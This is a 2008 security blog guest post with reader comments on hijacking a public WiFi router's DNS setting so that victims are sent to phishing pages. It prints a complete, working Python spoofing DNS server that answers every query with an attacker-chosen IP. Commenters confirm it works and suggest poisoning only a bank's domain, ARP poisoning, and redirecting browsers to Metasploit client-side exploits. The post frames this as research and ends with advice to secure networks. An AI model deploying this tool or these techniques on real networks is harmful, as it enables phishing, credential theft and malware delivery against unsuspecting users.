WiFi Ownage

Thu, 07 Feb 2008 10:59:13 GMT

This month GNUCITIZEN's guest blogger is Sam Aldis, the founder of darkstar.me.uk. Sam started as a blackhat/script kiddie but soon he has learned a life lesson when he broke into a big football(soccer) leagues site. Sam did not serve any sentence but he had to pay a hefty fine. This is how he turned into a whitehat and now he is in the process of setting up his own security company. These are his words:

I have recently been doing research into WiFi connections without wepkeys and where the attacker is able to change the primary DNS server on the router. This is actually a very serious problem as the attacker is able to get your credit card details or any other information you input without you even knowing.

Imagine you are at a hotel with your laptop. You connect to the WiFi that they provide and type in www.google.com, which brings up google's front page. The address bar says http://www.google.com and the page looks genuine so it is.. isn't it? However, attackers may could have got access to the router and changed the primary DNS server through many of the available methods in the wild, like UPnP hacking, etc.

Theoretically, the attacker could use any IP address to pull the trick, as long as a DNS server was running behind the UDP port 53. But it would be more beneficial if the attacker is under control of this DNS server, so he/she is able to show the user what ever they want them to see. For example, the user could type in their bank's website address and end up at a phishing page but they wouldn't know because they would see their banks address in the title bar and the page could be made to look exactly the same (and auto-update itself through some PHP magic). When the user logs in, a fake DNS server will respond which will make the user go to the wrong IP address. As you can see this is a big threat that will affect anyone who hasn't secured their network.

I have created a python script which can act as a temporary DNS server which will direct all requests to a certain IP (keep checking http://darkstar.me.uk for updates). Here is the script that complies to the scenarios described above:

# DNS Injection Server
# Created By fazed
# DNSQuery class adapted from Francisco Santos's
# code. why re-invent the wheel?

from socket import *

class DNSQuery:
 def __init__(self, data):
   self.data=data
   self.domain=''

   tipo = (ord(data[2]) >> 3) & 15
   if tipo == 0:
     ini=12
     lon=ord(data[ini])
     while lon != 0:
       self.domain+=data[ini+1:ini+lon+1]+'.'
       ini+=lon+1
       lon=ord(data[ini])

 def respond(self, ip):
   packet=''
   if self.domain:
     packet+=self.data[:2] + "\x81\x80"
     packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
     packet+=self.data[12:]
     packet+='\xc0\x0c'
     packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
     packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
   return packet

print ":: DNS Injection Server Started ::"
sh = socket(AF_INET, SOCK_DGRAM)
print "Socket Handle Created.."
sh.bind(('',53))
print "Socket Handle Bound To UDP Port 53"
ip = raw_input("IP to inject: ")
try:
   while 1:
       data, addr = sh.recvfrom(1024)
       print "DNS Request From:", addr[0]
       p = DNSQuery(data)
       print "Sending IP address:", ip
       sh.sendto(p.respond(ip),addr)
       print "Response Sent.."
except KeyboardInterrupt:
   print ":: DNS Injection Server Stoped ::"
   sh.close()

The bottom line is: secure your networks and don't trust public WiFi access points.

Adrian PastorAdrian Pastor
That's a quite handy script, I will play around with it later on today!
Adrian PastorAdrian Pastor
The script works like a charm, just tested it. The idea is that any domain names resolve to one IP address chosen by the attacker. It'd also be useful to write a variation of the tool that only makes certain domain names resolve to the evil IP address, and simply query a public DNS server for all other IPs. For instance, maybe the attacker is only interested in poisoning www.trustedbank.foo and wants all other domain names to resolve to legitimate IP addresses.
SidSid
I wrote 3 scripts in the same spirit aside of Wifitap that can be foudn in the same tarball: wifiping.py is just a PoC that answers ping requests on the fly wifiarp.py that poisons ARP requests on the fly wifidns.py that roughly does the same as yours Everything based on Scapy.
Adrian PastorAdrian Pastor
@Sid - sounds interesting!.
sqidsqid
"Sam started as a blackhat/script kiddie but soon he has learned a life lesson when he broke into a big football(soccer) leagues site. Sam did not serve any sentence but he had to pay a hefty fine. This is how he turned into a whitehat..." You make it sounds like Gnucitizen is similar to Alcoholics Anonymous for blackhats. Also, by grouping blackhat and script-kiddie together, you make it sound like they are related to another, when, in fact, they are not. Could you give me some good reasoning on that?
Christopher HaneyChristopher Haney
Would this attack also work is you simply used (for example) a WRT54G with DD-WRT as a repeater and simply acted as a second access point to the WEP free AP?
pdppdp
sqid, it should have been blackhat script kiddie (no slash). And yes it makes a perfect sense. Blackhat can be used as a noun or adjective. Cheers.
SidSid
@Christopher: traffic injection attacks on WiFi work like a charm on WEP networks too, as long as you know the key. Not a big requirement after all ;) I could have Wifitap work on a WDS link as well, with an ugly hack I'm not really proud of. Getting back to the script, this attack is very like airpwn. This tool, demonstrated at Defcon 2004, catches HTTP requests for pictures and injects arbitrary replies. Very handy when you have... Let's say... A JPEG or PNG buffer overflow on browser :) You can also reply "GET /" requests with a 301 or 302 that will redirect browser anywhere you want, like a metasploit loaded with whatever client side exploit you may like. Check http://sid.rstack.org/pres/0608_BCS_OpenWireless.pdf slides 33 to 47.
fazedfazed
@squid: what is meant is that I went through both being a script kiddie and as I learned more a blackhat. thanks for the comments everyone @Adrian: I was thinking about creating a more complex script which can also redirect different entered urls to different IP's/vHost's and let any that are not listed in this "host" file go to the correct location but this script is just a PoC.
reznrezn
This code may be helpful in further exploring malicious DNS server creation: http://www.dnspython.org/
lljkrieglljkrieg
DNS hijacking is certainly an interesting and potentially catastrophic issue for internet users but why reinvent the wheel to exploit the results? It is possible for an attacker controlled DNS server that supports wildcards, such as bind, to force all domains to resolve to the attacker's web server. The web server can then proxy the real hostname and inject data into the stream, or load phishing pages for specific sites (sites which don't allow proxies perhaps?), or launch malware, etc. This way user HTTP requests can easily be logged and a simple script on the web server could immediately change the payload without having to worry about DNS lease length.
pdppdp
you are right! I guess the intention was to write something that runs without too much configuration.